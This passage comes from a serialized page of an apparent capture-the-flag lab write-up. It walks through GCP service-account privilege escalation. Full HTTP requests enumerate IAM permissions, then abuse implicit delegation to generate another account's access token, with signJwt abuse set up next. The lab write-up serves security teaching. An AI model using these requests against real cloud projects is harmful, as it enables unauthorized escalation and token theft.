roles/owner\n",{"type":33,"tag":128,"props":1164,"children":1166},{"class":130,"line":1165},24,[1167,1171],{"type":33,"tag":128,"props":1168,"children":1169},{"style":135},[1170],{"type":38,"value":907},{"type":33,"tag":128,"props":1172,"children":1173},{"style":140},[1174],{"type":38,"value":912},{"type":33,"tag":128,"props":1176,"children":1178},{"class":130,"line":1177},25,[1179,1183],{"type":33,"tag":128,"props":1180,"children":1181},{"style":135},[1182],{"type":38,"value":920},{"type":33,"tag":128,"props":1184,"children":1185},{"style":140},[1186],{"type":38,"value":1111},{"type":33,"tag":128,"props":1188,"children":1190},{"class":130,"line":1189},26,[1191,1195],{"type":33,"tag":128,"props":1192,"children":1193},{"style":135},[1194],{"type":38,"value":933},{"type":33,"tag":128,"props":1196,"children":1197},{"style":140},[1198],{"type":38,"value":1199}," roles/run.invoker\n",{"type":33,"tag":128,"props":1201,"children":1203},{"class":130,"line":1202},27,[1204,1208],{"type":33,"tag":128,"props":1205,"children":1206},{"style":135},[1207],{"type":38,"value":907},{"type":33,"tag":128,"props":1209,"children":1210},{"style":140},[1211],{"type":38,"value":912},{"type":33,"tag":128,"props":1213,"children":1215},{"class":130,"line":1214},28,[1216,1220],{"type":33,"tag":128,"props":1217,"children":1218},{"style":135},[1219],{"type":38,"value":920},{"type":33,"tag":128,"props":1221,"children":1222},{"style":140},[1223],{"type":38,"value":1111},{"type":33,"tag":128,"props":1225,"children":1227},{"class":130,"line":1226},29,[1228,1232],{"type":33,"tag":128,"props":1229,"children":1230},{"style":135},[1231],{"type":38,"value":933},{"type":33,"tag":128,"props":1233,"children":1234},{"style":140},[1235],{"type":38,"value":1236}," roles/secretmanager.viewer\n",{"type":33,"tag":128,"props":1238,"children":1240},{"class":130,"line":1239},30,[1241,1245],{"type":33,"tag":128,"props":1242,"children":1243},{"style":135},[1244],{"type":38,"value":907},{"type":33,"tag":128,"props":1246,"children":1247},{"style":140},[1248],{"type":38,"value":912},{"type":33,"tag":128,"props":1250,"children":1252},{"class":130,"line":1251},31,[1253,1257],{"type":33,"tag":128,"props":1254,"children":1255},{"style":135},[1256],{"type":38,"value":920},{"type":33,"tag":128,"props":1258,"children":1259},{"style":140},[1260],{"type":38,"value":925},{"type":33,"tag":128,"props":1262,"children":1264},{"class":130,"line":1263},32,[1265,1269],{"type":33,"tag":128,"props":1266,"children":1267},{"style":135},[1268],{"type":38,"value":933},{"type":33,"tag":128,"props":1270,"children":1271},{"style":140},[1272],{"type":38,"value":1273}," roles/storage.bucketViewer\n",{"type":33,"tag":128,"props":1275,"children":1277},{"class":130,"line":1276},33,[1278,1282],{"type":33,"tag":128,"props":1279,"children":1280},{"style":135},[1281],{"type":38,"value":907},{"type":33,"tag":128,"props":1283,"children":1284},{"style":140},[1285],{"type":38,"value":912},{"type":33,"tag":128,"props":1287,"children":1289},{"class":130,"line":1288},34,[1290,1294],{"type":33,"tag":128,"props":1291,"children":1292},{"style":135},[1293],{"type":38,"value":920},{"type":33,"tag":128,"props":1295,"children":1296},{"style":140},[1297],{"type":38,"value":925},{"type":33,"tag":128,"props":1299,"children":1301},{"class":130,"line":1300},35,[1302,1306],{"type":33,"tag":128,"props":1303,"children":1304},{"style":135},[1305],{"type":38,"value":933},{"type":33,"tag":128,"props":1307,"children":1308},{"style":140},[1309],{"type":38,"value":1310}," roles/storage.objectViewer\n",{"type":33,"tag":128,"props":1312,"children":1314},{"class":130,"line":1313},36,[1315,1320],{"type":33,"tag":128,"props":1316,"children":1317},{"style":135},[1318],{"type":38,"value":1319},"etag:",{"type":33,"tag":128,"props":1321,"children":1322},{"style":140},[1323],{"type":38,"value":1324}," BwYxzfQaKR4=\n",{"type":33,"tag":128,"props":1326,"children":1328},{"class":130,"line":1327},37,[1329,1334],{"type":33,"tag":128,"props":1330,"children":1331},{"style":135},[1332],{"type":38,"value":1333},"version:",{"type":33,"tag":128,"props":1335,"children":1336},{"style":523},[1337],{"type":38,"value":1338}," 1\n",{"type":33,"tag":47,"props":1340,"children":1341},{},[1342],{"type":38,"value":1343},"From the command output, we have both the roles and the list of service accounts, this information is really important because it will allow us to list the actions that our current service account has on other service accounts.",{"type":33,"tag":47,"props":1345,"children":1346},{},[1347],{"type":38,"value":1348},"The permissions that are relevant in our case are the following:",{"type":33,"tag":239,"props":1350,"children":1351},{},[1352,1357,1362,1367],{"type":33,"tag":243,"props":1353,"children":1354},{},[1355],{"type":38,"value":1356},"iam.serviceAccounts.getAccessToken",{"type":33,"tag":243,"props":1358,"children":1359},{},[1360],{"type":38,"value":1361},"iam.serviceAccounts.signJwt",{"type":33,"tag":243,"props":1363,"children":1364},{},[1365],{"type":38,"value":1366},"iam.serviceAccounts.implicitDelegation",{"type":33,"tag":243,"props":1368,"children":1369},{},[1370],{"type":38,"value":1371},"iam.serviceAccounts.actAs",{"type":33,"tag":47,"props":1373,"children":1374},{},[1375],{"type":38,"value":1376},"Each of them allows us to elevate our privileges horizontally to another service account.",{"type":33,"tag":47,"props":1378,"children":1379},{},[1380],{"type":38,"value":1381},"To enumerate, we can use the GCP API which allows us to know the permissions our service account has in relation to the target service account:",{"type":33,"tag":239,"props":1383,"children":1384},{},[1385,1396,1407,1420],{"type":33,"tag":243,"props":1386,"children":1387},{},[1388,1390],{"type":38,"value":1389},"URL: ",{"type":33,"tag":105,"props":1391,"children":1393},{"className":1392},[],[1394],{"type":38,"value":1395},"https://iam.googleapis.com/v1/projects/-/serviceAccounts/\u003CTARGET_SA>:testIamPermissions",{"type":33,"tag":243,"props":1397,"children":1398},{},[1399,1401],{"type":38,"value":1400},"Method: ",{"type":33,"tag":105,"props":1402,"children":1404},{"className":1403},[],[1405],{"type":38,"value":1406},"POST",{"type":33,"tag":243,"props":1408,"children":1409},{},[1410,1412,1418],{"type":38,"value":1411},"Mandatory header: ",{"type":33,"tag":105,"props":1413,"children":1415},{"className":1414},[],[1416],{"type":38,"value":1417},"Authorization Bearer",{"type":38,"value":1419}," with the access token from our service account.",{"type":33,"tag":243,"props":1421,"children":1422},{},[1423],{"type":38,"value":1424},"Body:",{"type":33,"tag":114,"props":1426,"children":1427},{"lang":633},[1428],{"type":33,"tag":119,"props":1429,"children":1431},{"className":637,"code":1430,"language":633,"meta":8,"style":8},"{\n \"permissions\": [\n \"iam.serviceAccounts.getAccessToken\",\n \"iam.serviceAccounts.signJwt\",\n \"iam.serviceAccounts.implicitDelegation\",\n \"iam.serviceAccounts.actAs\"\n ]\n}\n",[1432],{"type":33,"tag":105,"props":1433,"children":1434},{"__ignoreMap":8},[1435,1442,1467,1486,1505,1524,1539,1547],{"type":33,"tag":128,"props":1436,"children":1437},{"class":130,"line":131},[1438],{"type":33,"tag":128,"props":1439,"children":1440},{"style":312},[1441],{"type":38,"value":650},{"type":33,"tag":128,"props":1443,"children":1444},{"class":130,"line":362},[1445,1449,1454,1458,1462],{"type":33,"tag":128,"props":1446,"children":1447},{"style":656},[1448],{"type":38,"value":659},{"type":33,"tag":128,"props":1450,"children":1451},{"style":437},[1452],{"type":38,"value":1453},"permissions",{"type":33,"tag":128,"props":1455,"children":1456},{"style":656},[1457],{"type":38,"value":669},{"type":33,"tag":128,"props":1459,"children":1460},{"style":312},[1461],{"type":38,"value":284},{"type":33,"tag":128,"props":1463,"children":1464},{"style":312},[1465],{"type":38,"value":1466}," [\n",{"type":33,"tag":128,"props":1468,"children":1469},{"class":130,"line":403},[1470,1474,1478,1482],{"type":33,"tag":128,"props":1471,"children":1472},{"style":676},[1473],{"type":38,"value":771},{"type":33,"tag":128,"props":1475,"children":1476},{"style":140},[1477],{"type":38,"value":1356},{"type":33,"tag":128,"props":1479,"children":1480},{"style":676},[1481],{"type":38,"value":669},{"type":33,"tag":128,"props":1483,"children":1484},{"style":312},[1485],{"type":38,"value":693},{"type":33,"tag":128,"props":1487,"children":1488},{"class":130,"line":739},[1489,1493,1497,1501],{"type":33,"tag":128,"props":1490,"children":1491},{"style":676},[1492],{"type":38,"value":771},{"type":33,"tag":128,"props":1494,"children":1495},{"style":140},[1496],{"type":38,"value":1361},{"type":33,"tag":128,"props":1498,"children":1499},{"style":676},[1500],{"type":38,"value":669},{"type":33,"tag":128,"props":1502,"children":1503},{"style":312},[1504],{"type":38,"value":693},{"type":33,"tag":128,"props":1506,"children":1507},{"class":130,"line":765},[1508,1512,1516,1520],{"type":33,"tag":128,"props":1509,"children":1510},{"style":676},[1511],{"type":38,"value":771},{"type":33,"tag":128,"props":1513,"children":1514},{"style":140},[1515],{"type":38,"value":1366},{"type":33,"tag":128,"props":1517,"children":1518},{"style":676},[1519],{"type":38,"value":669},{"type":33,"tag":128,"props":1521,"children":1522},{"style":312},[1523],{"type":38,"value":693},{"type":33,"tag":128,"props":1525,"children":1526},{"class":130,"line":804},[1527,1531,1535],{"type":33,"tag":128,"props":1528,"children":1529},{"style":676},[1530],{"type":38,"value":771},{"type":33,"tag":128,"props":1532,"children":1533},{"style":140},[1534],{"type":38,"value":1371},{"type":33,"tag":128,"props":1536,"children":1537},{"style":676},[1538],{"type":38,"value":836},{"type":33,"tag":128,"props":1540,"children":1541},{"class":130,"line":839},[1542],{"type":33,"tag":128,"props":1543,"children":1544},{"style":312},[1545],{"type":38,"value":1546}," ]\n",{"type":33,"tag":128,"props":1548,"children":1549},{"class":130,"line":848},[1550],{"type":33,"tag":128,"props":1551,"children":1552},{"style":312},[1553],{"type":38,"value":854},{"type":33,"tag":47,"props":1555,"children":1556},{},[1557],{"type":38,"value":1558},"Here is an example of an HTTP request:",{"type":33,"tag":114,"props":1560,"children":1562},{"lang":1561},"http",[1563],{"type":33,"tag":119,"props":1564,"children":1567},{"className":1565,"code":1566,"language":1561,"meta":8,"style":8},"language-http shiki shiki-themes vitesse-dark","POST /v1/projects/-/serviceAccounts/\u003CTARGET_SA>:testIamPermissions HTTP/2\nHost: iam.googleapis.com\nAuthorization: Bearer ya29.c.c0ASRK0GYygwCJiA5fIL05[..SNIP..]95utqtFJgtFu\nAccept: */*\nContent-Type: application/json\nContent-Length: 159\n\n{\n \"permissions\": [\n \"iam.serviceAccounts.getAccessToken\",\n \"iam.serviceAccounts.signJwt\",\n \"iam.serviceAccounts.implicitDelegation\",\n \"iam.serviceAccounts.actAs\"\n ]\n}\n",[1568],{"type":33,"tag":105,"props":1569,"children":1570},{"__ignoreMap":8},[1571,1584,1597,1610,1623,1636,1649,1656,1663,1686,1705,1724,1743,1758,1766],{"type":33,"tag":128,"props":1572,"children":1573},{"class":130,"line":131},[1574,1579],{"type":33,"tag":128,"props":1575,"children":1577},{"style":1576},"--shiki-default:#4D9375",[1578],{"type":38,"value":1406},{"type":33,"tag":128,"props":1580,"children":1581},{"style":323},[1582],{"type":38,"value":1583}," /v1/projects/-/serviceAccounts/\u003CTARGET_SA>:testIamPermissions HTTP/2\n",{"type":33,"tag":128,"props":1585,"children":1586},{"class":130,"line":362},[1587,1592],{"type":33,"tag":128,"props":1588,"children":1589},{"style":1576},[1590],{"type":38,"value":1591},"Host:",{"type":33,"tag":128,"props":1593,"children":1594},{"style":140},[1595],{"type":38,"value":1596}," iam.googleapis.com\n",{"type":33,"tag":128,"props":1598,"children":1599},{"class":130,"line":403},[1600,1605],{"type":33,"tag":128,"props":1601,"children":1602},{"style":1576},[1603],{"type":38,"value":1604},"Authorization:",{"type":33,"tag":128,"props":1606,"children":1607},{"style":140},[1608],{"type":38,"value":1609}," Bearer ya29.c.c0ASRK0GYygwCJiA5fIL05[..SNIP..]95utqtFJgtFu\n",{"type":33,"tag":128,"props":1611,"children":1612},{"class":130,"line":739},[1613,1618],{"type":33,"tag":128,"props":1614,"children":1615},{"style":1576},[1616],{"type":38,"value":1617},"Accept:",{"type":33,"tag":128,"props":1619,"children":1620},{"style":140},[1621],{"type":38,"value":1622}," */*\n",{"type":33,"tag":128,"props":1624,"children":1625},{"class":130,"line":765},[1626,1631],{"type":33,"tag":128,"props":1627,"children":1628},{"style":1576},[1629],{"type":38,"value":1630},"Content-Type:",{"type":33,"tag":128,"props":1632,"children":1633},{"style":140},[1634],{"type":38,"value":1635}," application/json\n",{"type":33,"tag":128,"props":1637,"children":1638},{"class":130,"line":804},[1639,1644],{"type":33,"tag":128,"props":1640,"children":1641},{"style":1576},[1642],{"type":38,"value":1643},"Content-Length:",{"type":33,"tag":128,"props":1645,"children":1646},{"style":140},[1647],{"type":38,"value":1648}," 159\n",{"type":33,"tag":128,"props":1650,"children":1651},{"class":130,"line":839},[1652],{"type":33,"tag":128,"props":1653,"children":1654},{"emptyLinePlaceholder":896},[1655],{"type":38,"value":899},{"type":33,"tag":128,"props":1657,"children":1658},{"class":130,"line":848},[1659],{"type":33,"tag":128,"props":1660,"children":1661},{"style":312},[1662],{"type":38,"value":650},{"type":33,"tag":128,"props":1664,"children":1665},{"class":130,"line":976},[1666,1670,1674,1678,1682],{"type":33,"tag":128,"props":1667,"children":1668},{"style":656},[1669],{"type":38,"value":659},{"type":33,"tag":128,"props":1671,"children":1672},{"style":437},[1673],{"type":38,"value":1453},{"type":33,"tag":128,"props":1675,"children":1676},{"style":656},[1677],{"type":38,"value":669},{"type":33,"tag":128,"props":1679,"children":1680},{"style":312},[1681],{"type":38,"value":284},{"type":33,"tag":128,"props":1683,"children":1684},{"style":312},[1685],{"type":38,"value":1466},{"type":33,"tag":128,"props":1687,"children":1688},{"class":130,"line":988},[1689,1693,1697,1701],{"type":33,"tag":128,"props":1690,"children":1691},{"style":676},[1692],{"type":38,"value":771},{"type":33,"tag":128,"props":1694,"children":1695},{"style":140},[1696],{"type":38,"value":1356},{"type":33,"tag":128,"props":1698,"children":1699},{"style":676},[1700],{"type":38,"value":669},{"type":33,"tag":128,"props":1702,"children":1703},{"style":312},[1704],{"type":38,"value":693},{"type":33,"tag":128,"props":1706,"children":1707},{"class":130,"line":1001},[1708,1712,1716,1720],{"type":33,"tag":128,"props":1709,"children":1710},{"style":676},[1711],{"type":38,"value":771},{"type":33,"tag":128,"props":1713,"children":1714},{"style":140},[1715],{"type":38,"value":1361},{"type":33,"tag":128,"props":1717,"children":1718},{"style":676},[1719],{"type":38,"value":669},{"type":33,"tag":128,"props":1721,"children":1722},{"style":312},[1723],{"type":38,"value":693},{"type":33,"tag":128,"props":1725,"children":1726},{"class":130,"line":1014},[1727,1731,1735,1739],{"type":33,"tag":128,"props":1728,"children":1729},{"style":676},[1730],{"type":38,"value":771},{"type":33,"tag":128,"props":1732,"children":1733},{"style":140},[1734],{"type":38,"value":1366},{"type":33,"tag":128,"props":1736,"children":1737},{"style":676},[1738],{"type":38,"value":669},{"type":33,"tag":128,"props":1740,"children":1741},{"style":312},[1742],{"type":38,"value":693},{"type":33,"tag":128,"props":1744,"children":1745},{"class":130,"line":1026},[1746,1750,1754],{"type":33,"tag":128,"props":1747,"children":1748},{"style":676},[1749],{"type":38,"value":771},{"type":33,"tag":128,"props":1751,"children":1752},{"style":140},[1753],{"type":38,"value":1371},{"type":33,"tag":128,"props":1755,"children":1756},{"style":676},[1757],{"type":38,"value":836},{"type":33,"tag":128,"props":1759,"children":1760},{"class":130,"line":1038},[1761],{"type":33,"tag":128,"props":1762,"children":1763},{"style":312},[1764],{"type":38,"value":1765}," ]\n",{"type":33,"tag":128,"props":1767,"children":1768},{"class":130,"line":1051},[1769],{"type":33,"tag":128,"props":1770,"children":1771},{"style":312},[1772],{"type":38,"value":854},{"type":33,"tag":47,"props":1774,"children":1775},{},[1776],{"type":38,"value":1777},"The response will contain the permissions that our service account has on the target service account.",{"type":33,"tag":47,"props":1779,"children":1780},{},[1781],{"type":38,"value":1782},"You will need to go through each service account with this request to determine if our service account has one or several of these permissions on another service account. Personally, I use Burp's Intruder but it's possible to make a custom bash script or use ffuf.",{"type":33,"tag":75,"props":1784,"children":1786},{"imgSrc":1785,":width":78},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743699663/writeups/pwnedlabs-gcp-challenge/intruder-enum-perms.webp",[],{"type":33,"tag":47,"props":1788,"children":1789},{},[1790,1792,1798],{"type":38,"value":1791},"After our enumeration, we can see that one of the requests has a longer return size than the others and we can see that we have implicit delegation rights on the service account ",{"type":33,"tag":105,"props":1793,"children":1795},{"className":1794},[],[1796],{"type":38,"value":1797},"sql-424@gr-proj-4.iam.gserviceaccount.com",{"type":38,"value":215},{"type":33,"tag":75,"props":1800,"children":1802},{"imgSrc":1801},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743699775/writeups/pwnedlabs-gcp-challenge/result-intruder-enum-first.webp",[],{"type":33,"tag":47,"props":1804,"children":1805},{},[1806],{"type":38,"value":1807},"In the following chapter, we will detail the implicit delegation attack path to escalate our privileges horizontally.",{"type":33,"tag":40,"props":1809,"children":1811},{"id":1810},"implicit-delegation",[1812],{"type":38,"value":1813},"Implicit delegation",{"type":33,"tag":47,"props":1815,"children":1816},{},[1817,1819,1826],{"type":38,"value":1818},"Before we begin, I invite you to read the ",{"type":33,"tag":53,"props":1820,"children":1823},{"href":1821,"rel":1822},"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1",[57],[1824],{"type":38,"value":1825},"rhinosecurity article",{"type":38,"value":1827}," about privilege escalation methods on GCP, where a section is dedicated to implicit delegation.",{"type":33,"tag":47,"props":1829,"children":1830},{},[1831],{"type":38,"value":1832},"What does the privilege escalation scenario via implicit delegation permission consist of?",{"type":33,"tag":47,"props":1834,"children":1835},{},[1836,1838,1844,1846,1852],{"type":38,"value":1837},"Implicit delegation occurs when a service account A has ",{"type":33,"tag":105,"props":1839,"children":1841},{"className":1840},[],[1842],{"type":38,"value":1843},"implicitDelegation",{"type":38,"value":1845}," rights on a service account B which itself has ",{"type":33,"tag":105,"props":1847,"children":1849},{"className":1848},[],[1850],{"type":38,"value":1851},"getAccessToken",{"type":38,"value":1853}," rights on a service account C.",{"type":33,"tag":47,"props":1855,"children":1856},{},[1857],{"type":38,"value":1858},"So in our case we have this diagram:",{"type":33,"tag":75,"props":1860,"children":1863},{"imgSrc":1861,":width":1862},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743719479/writeups/pwnedlabs-gcp-challenge/implicit-delegation.webp","500",[],{"type":33,"tag":47,"props":1865,"children":1866},{},[1867],{"type":38,"value":1868},"To exploit this attack path, we will also go through the GCP API to get the access token of the service account C:",{"type":33,"tag":239,"props":1870,"children":1871},{},[1872,1882,1891,1901],{"type":33,"tag":243,"props":1873,"children":1874},{},[1875,1876],{"type":38,"value":1389},{"type":33,"tag":105,"props":1877,"children":1879},{"className":1878},[],[1880],{"type":38,"value":1881},"https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/\u003CTARGET_SA>:generateAccessToken",{"type":33,"tag":243,"props":1883,"children":1884},{},[1885,1886],{"type":38,"value":1400},{"type":33,"tag":105,"props":1887,"children":1889},{"className":1888},[],[1890],{"type":38,"value":1406},{"type":33,"tag":243,"props":1892,"children":1893},{},[1894,1895,1900],{"type":38,"value":1411},{"type":33,"tag":105,"props":1896,"children":1898},{"className":1897},[],[1899],{"type":38,"value":1417},{"type":38,"value":1419},{"type":33,"tag":243,"props":1902,"children":1903},{},[1904],{"type":38,"value":1424},{"type":33,"tag":114,"props":1906,"children":1907},{"lang":633},[1908],{"type":33,"tag":119,"props":1909,"children":1911},{"className":637,"code":1910,"language":633,"meta":8,"style":8},"{\n \"delegates\": [\"projects/-/serviceAccounts/sql-424@gr-proj-4.iam.gserviceaccount.com\"],\n \"scope\": [\"https://www.googleapis.com/auth/cloud-platform\"] \n}\n",[1912],{"type":33,"tag":105,"props":1913,"children":1914},{"__ignoreMap":8},[1915,1922,1963,2009],{"type":33,"tag":128,"props":1916,"children":1917},{"class":130,"line":131},[1918],{"type":33,"tag":128,"props":1919,"children":1920},{"style":312},[1921],{"type":38,"value":650},{"type":33,"tag":128,"props":1923,"children":1924},{"class":130,"line":362},[1925,1929,1934,1938,1942,1946,1950,1955,1959],{"type":33,"tag":128,"props":1926,"children":1927},{"style":656},[1928],{"type":38,"value":659},{"type":33,"tag":128,"props":1930,"children":1931},{"style":437},[1932],{"type":38,"value":1933},"delegates",{"type":33,"tag":128,"props":1935,"children":1936},{"style":656},[1937],{"type":38,"value":669},{"type":33,"tag":128,"props":1939,"children":1940},{"style":312},[1941],{"type":38,"value":284},{"type":33,"tag":128,"props":1943,"children":1944},{"style":312},[1945],{"type":38,"value":718},{"type":33,"tag":128,"props":1947,"children":1948},{"style":676},[1949],{"type":38,"value":669},{"type":33,"tag":128,"props":1951,"children":1952},{"style":140},[1953],{"type":38,"value":1954},"projects/-/serviceAccounts/sql-424@gr-proj-4.iam.gserviceaccount.com",{"type":33,"tag":128,"props":1956,"children":1957},{"style":676},[1958],{"type":38,"value":669},{"type":33,"tag":128,"props":1960,"children":1961},{"style":312},[1962],{"type":38,"value":736},{"type":33,"tag":128,"props":1964,"children":1965},{"class":130,"line":403},[1966,1970,1975,1979,1983,1987,1991,1996,2000,2004],{"type":33,"tag":128,"props":1967,"children":1968},{"style":656},[1969],{"type":38,"value":659},{"type":33,"tag":128,"props":1971,"children":1972},{"style":437},[1973],{"type":38,"value":1974},"scope",{"type":33,"tag":128,"props":1976,"children":1977},{"style":656},[1978],{"type":38,"value":669},{"type":33,"tag":128,"props":1980,"children":1981},{"style":312},[1982],{"type":38,"value":284},{"type":33,"tag":128,"props":1984,"children":1985},{"style":312},[1986],{"type":38,"value":718},{"type":33,"tag":128,"props":1988,"children":1989},{"style":676},[1990],{"type":38,"value":669},{"type":33,"tag":128,"props":1992,"children":1993},{"style":140},[1994],{"type":38,"value":1995},"https://www.googleapis.com/auth/cloud-platform",{"type":33,"tag":128,"props":1997,"children":1998},{"style":676},[1999],{"type":38,"value":669},{"type":33,"tag":128,"props":2001,"children":2002},{"style":312},[2003],{"type":38,"value":354},{"type":33,"tag":128,"props":2005,"children":2006},{"style":323},[2007],{"type":38,"value":2008}," \n",{"type":33,"tag":128,"props":2010,"children":2011},{"class":130,"line":739},[2012],{"type":33,"tag":128,"props":2013,"children":2014},{"style":312},[2015],{"type":38,"value":854},{"type":33,"tag":47,"props":2017,"children":2018},{},[2019],{"type":38,"value":1558},{"type":33,"tag":114,"props":2021,"children":2022},{"lang":1561},[2023],{"type":33,"tag":119,"props":2024,"children":2026},{"className":1565,"code":2025,"language":1561,"meta":8,"style":8},"POST /v1/projects/-/serviceAccounts/\u003CTARGET_SA>:generateAccessToken HTTP/2\nHost: iamcredentials.googleapis.com\nAuthorization: Bearer ya29.c.c0ASRK0GYygwCJiA5fIL05[..SNIP..]95utqtFJgtFu\nAccept: */*\nContent-Type: application/json\nContent-Length: 149\n\n{\n \"delegates\":[\n \"projects/-/serviceAccounts/sql-424@gr-proj-4.iam.gserviceaccount.com\"\n ],\n \"scope\": [\n \"https://www.googleapis.com/auth/cloud-platform\"\n ]\n}\n",[2027],{"type":33,"tag":105,"props":2028,"children":2029},{"__ignoreMap":8},[2030,2042,2054,2065,2076,2087,2099,2106,2113,2133,2148,2156,2179,2194,2201],{"type":33,"tag":128,"props":2031,"children":2032},{"class":130,"line":131},[2033,2037],{"type":33,"tag":128,"props":2034,"children":2035},{"style":1576},[2036],{"type":38,"value":1406},{"type":33,"tag":128,"props":2038,"children":2039},{"style":323},[2040],{"type":38,"value":2041}," /v1/projects/-/serviceAccounts/\u003CTARGET_SA>:generateAccessToken HTTP/2\n",{"type":33,"tag":128,"props":2043,"children":2044},{"class":130,"line":362},[2045,2049],{"type":33,"tag":128,"props":2046,"children":2047},{"style":1576},[2048],{"type":38,"value":1591},{"type":33,"tag":128,"props":2050,"children":2051},{"style":140},[2052],{"type":38,"value":2053}," iamcredentials.googleapis.com\n",{"type":33,"tag":128,"props":2055,"children":2056},{"class":130,"line":403},[2057,2061],{"type":33,"tag":128,"props":2058,"children":2059},{"style":1576},[2060],{"type":38,"value":1604},{"type":33,"tag":128,"props":2062,"children":2063},{"style":140},[2064],{"type":38,"value":1609},{"type":33,"tag":128,"props":2066,"children":2067},{"class":130,"line":739},[2068,2072],{"type":33,"tag":128,"props":2069,"children":2070},{"style":1576},[2071],{"type":38,"value":1617},{"type":33,"tag":128,"props":2073,"children":2074},{"style":140},[2075],{"type":38,"value":1622},{"type":33,"tag":128,"props":2077,"children":2078},{"class":130,"line":765},[2079,2083],{"type":33,"tag":128,"props":2080,"children":2081},{"style":1576},[2082],{"type":38,"value":1630},{"type":33,"tag":128,"props":2084,"children":2085},{"style":140},[2086],{"type":38,"value":1635},{"type":33,"tag":128,"props":2088,"children":2089},{"class":130,"line":804},[2090,2094],{"type":33,"tag":128,"props":2091,"children":2092},{"style":1576},[2093],{"type":38,"value":1643},{"type":33,"tag":128,"props":2095,"children":2096},{"style":140},[2097],{"type":38,"value":2098}," 149\n",{"type":33,"tag":128,"props":2100,"children":2101},{"class":130,"line":839},[2102],{"type":33,"tag":128,"props":2103,"children":2104},{"emptyLinePlaceholder":896},[2105],{"type":38,"value":899},{"type":33,"tag":128,"props":2107,"children":2108},{"class":130,"line":848},[2109],{"type":33,"tag":128,"props":2110,"children":2111},{"style":312},[2112],{"type":38,"value":650},{"type":33,"tag":128,"props":2114,"children":2115},{"class":130,"line":976},[2116,2120,2124,2128],{"type":33,"tag":128,"props":2117,"children":2118},{"style":656},[2119],{"type":38,"value":659},{"type":33,"tag":128,"props":2121,"children":2122},{"style":437},[2123],{"type":38,"value":1933},{"type":33,"tag":128,"props":2125,"children":2126},{"style":656},[2127],{"type":38,"value":669},{"type":33,"tag":128,"props":2129,"children":2130},{"style":312},[2131],{"type":38,"value":2132},":[\n",{"type":33,"tag":128,"props":2134,"children":2135},{"class":130,"line":988},[2136,2140,2144],{"type":33,"tag":128,"props":2137,"children":2138},{"style":676},[2139],{"type":38,"value":771},{"type":33,"tag":128,"props":2141,"children":2142},{"style":140},[2143],{"type":38,"value":1954},{"type":33,"tag":128,"props":2145,"children":2146},{"style":676},[2147],{"type":38,"value":836},{"type":33,"tag":128,"props":2149,"children":2150},{"class":130,"line":1001},[2151],{"type":33,"tag":128,"props":2152,"children":2153},{"style":312},[2154],{"type":38,"value":2155}," ],\n",{"type":33,"tag":128,"props":2157,"children":2158},{"class":130,"line":1014},[2159,2163,2167,2171,2175],{"type":33,"tag":128,"props":2160,"children":2161},{"style":656},[2162],{"type":38,"value":659},{"type":33,"tag":128,"props":2164,"children":2165},{"style":437},[2166],{"type":38,"value":1974},{"type":33,"tag":128,"props":2168,"children":2169},{"style":656},[2170],{"type":38,"value":669},{"type":33,"tag":128,"props":2172,"children":2173},{"style":312},[2174],{"type":38,"value":284},{"type":33,"tag":128,"props":2176,"children":2177},{"style":312},[2178],{"type":38,"value":1466},{"type":33,"tag":128,"props":2180,"children":2181},{"class":130,"line":1026},[2182,2186,2190],{"type":33,"tag":128,"props":2183,"children":2184},{"style":676},[2185],{"type":38,"value":771},{"type":33,"tag":128,"props":2187,"children":2188},{"style":140},[2189],{"type":38,"value":1995},{"type":33,"tag":128,"props":2191,"children":2192},{"style":676},[2193],{"type":38,"value":836},{"type":33,"tag":128,"props":2195,"children":2196},{"class":130,"line":1038},[2197],{"type":33,"tag":128,"props":2198,"children":2199},{"style":312},[2200],{"type":38,"value":1546},{"type":33,"tag":128,"props":2202,"children":2203},{"class":130,"line":1051},[2204],{"type":33,"tag":128,"props":2205,"children":2206},{"style":312},[2207],{"type":38,"value":854},{"type":33,"tag":47,"props":2209,"children":2210},{},[2211],{"type":38,"value":2212},"The response will contain the access token of the service account C.",{"type":33,"tag":47,"props":2214,"children":2215},{},[2216,2218,2224],{"type":38,"value":2217},"In our case, we don't know if the ",{"type":33,"tag":105,"props":2219,"children":2221},{"className":2220},[],[2222],{"type":38,"value":2223},"sql-424",{"type":38,"value":2225}," service account has getAccessToken rights on another service account, similar to enumeration parts we will need to fuzz with the service accounts that we are targeting.",{"type":33,"tag":75,"props":2227,"children":2229},{"imgSrc":2228,":width":78},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743700878/writeups/pwnedlabs-gcp-challenge/implicit-delegation-intruder.webp",[],{"type":33,"tag":47,"props":2231,"children":2232},{},[2233,2235,2240,2242,2247,2249,2255],{"type":38,"value":2234},"After our fuzzing, we can see that the service account ",{"type":33,"tag":105,"props":2236,"children":2238},{"className":2237},[],[2239],{"type":38,"value":2223},{"type":38,"value":2241}," has the ",{"type":33,"tag":105,"props":2243,"children":2245},{"className":2244},[],[2246],{"type":38,"value":1851},{"type":38,"value":2248}," permission on the ",{"type":33,"tag":105,"props":2250,"children":2252},{"className":2251},[],[2253],{"type":38,"value":2254},"analytics",{"type":38,"value":2256}," service account, which allowed us to retrieve its token.",{"type":33,"tag":75,"props":2258,"children":2260},{"imgSrc":2259,":width":78},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743701439/writeups/pwnedlabs-gcp-challenge/intruder-implicit-delegation-result.webp",[],{"type":33,"tag":47,"props":2262,"children":2263},{},[2264],{"type":38,"value":2265},"Now that we have a service account, we can repeat the enumeration process by fuzzing the permissions that our service account has on other service accounts.",{"type":33,"tag":75,"props":2267,"children":2269},{"imgSrc":2268,":width":78},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743717471/writeups/pwnedlabs-gcp-challenge/result-intruder-enum-second.webp",[],{"type":33,"tag":47,"props":2271,"children":2272},{},[2273,2275,2280,2282,2288],{"type":38,"value":2274},"We can see that our new ",{"type":33,"tag":105,"props":2276,"children":2278},{"className":2277},[],[2279],{"type":38,"value":2254},{"type":38,"value":2281}," service account has signJwt permissions on the ",{"type":33,"tag":105,"props":2283,"children":2285},{"className":2284},[],[2286],{"type":38,"value":2287},"platform-middleware",{"type":38,"value":2289}," service account. We will see on the next chapiter how to abuse this privilege to elevate our 